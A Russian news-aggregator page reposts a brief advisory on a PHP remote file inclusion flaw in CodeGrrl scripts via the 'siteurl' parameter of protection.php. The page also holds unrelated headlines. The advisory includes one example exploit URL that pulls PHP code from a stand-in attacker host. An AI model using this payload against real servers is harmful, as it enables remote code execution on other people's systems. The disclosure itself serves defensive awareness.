PHP инклюдинг в продуктах CodeGrrl - «Интернет»
sitename
Россияне оспорили отказ суда рассматривать иск о блокировке звонков в Telegram и WhatsApp - «Новости сети»
Россияне оспорили отказ суда рассматривать иск о блокировке звонков в Telegram и WhatsApp - «Новости сети»
 Sony анонсировала первый за семь лет проигрыватели виниловых пластинок - «Новости сети»
Sony анонсировала первый за семь лет проигрыватели виниловых пластинок - «Новости сети»
 Intel упускает миллиарды из-за дефицита процессоров и производственных проблем — акции рухнули на 11 % - «Новости сети»
Intel упускает миллиарды из-за дефицита процессоров и производственных проблем — акции рухнули на 11 % - «Новости сети»
 Илон Маск пообещал, что роботы Tesla Optimus точно-точно поступят в продажу в конце 2027 года - «Новости сети»
Илон Маск пообещал, что роботы Tesla Optimus точно-точно поступят в продажу в конце 2027 года - «Новости сети»
 Луна подождёт: третий пуск ракеты Blue Origin New Glenn в конце февраля доставит спутник главного конкурента Starlink - «Новости сети»
Луна подождёт: третий пуск ракеты Blue Origin New Glenn в конце февраля доставит спутник главного конкурента Starlink - «Новости сети»
 В Яндекс Картах добавили возможность делиться геопозицией с близкими - «Новости мира Интернет»
В Яндекс Картах добавили возможность делиться геопозицией с близкими - «Новости мира Интернет»
 Китайская блогерша объединила PS5, Xbox и Nintendo Switch 2 в корпусе Mac Pro - «Новости мира Интернет»
Китайская блогерша объединила PS5, Xbox и Nintendo Switch 2 в корпусе Mac Pro - «Новости мира Интернет»
 Яндекс связал умный дом и авто: «Алиса» научилась заводить машину - «Новости мира Интернет»
Яндекс связал умный дом и авто: «Алиса» научилась заводить машину - «Новости мира Интернет»
 Microsoft опубликовала рейтинг стран по уровню внедрения ИИ-сервисов - «Новости мира Интернет»
Microsoft опубликовала рейтинг стран по уровню внедрения ИИ-сервисов - «Новости мира Интернет»
 В Adobe Acrobat можно будет переводить PDF-документы в подкасты - «Новости мира Интернет»
В Adobe Acrobat можно будет переводить PDF-документы в подкасты - «Новости мира Интернет»
Новости мира Интернет » Новости » Новости мира Интернет » PHP инклюдинг в продуктах CodeGrrl - «Интернет»

✔PHP инклюдинг в продуктах CodeGrrl - «Интернет»

19 марта 2024 1 202 Новости / Новости мира Интернет 0

Программы: PHPCalendar 1.x
PHPClique 1.x
PHPCurrently 2.x
PHPFanBase 2.x
PHPQuotes 1.x

Опасность: Высокая

Наличие эксплоита: Да

Описание: Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует при обработке входных данных в параметре "siteurl" сценария protection.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на системе с привилегиями web сервера. Для успешной эксплуатации уязвимости опция register_globals должна быть включена в конфигурационном файле PHP. Пример:

http://www.example.com/protection.php?action=logout& siteurl=http://yourhost.com/malicoius-code.txt

URL производителя: http://codegrrl.com/

Решение: Способов устранения уязвимости не существует в настоящее время.


Программы: PHPCalendar 1.x PHPClique 1.x PHPCurrently 2.x PHPFanBase 2.x PHPQuotes 1.x Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует при обработке входных данных в параметре
Цитирование статьи, картинки - фото скриншот - Rambler News Service.
Иллюстрация к статье - Яндекс. Картинки.
Есть вопросы. Напишите нам.
Общие правила  поведения на сайте.
CSS, произвольный сценарий уязвимости выполнить существует
запостил(а)
Carroll
Вернуться назад
0

Смотрите также

А что там на главной? )))


Комментарии )))
Забыли пароль? Регистрация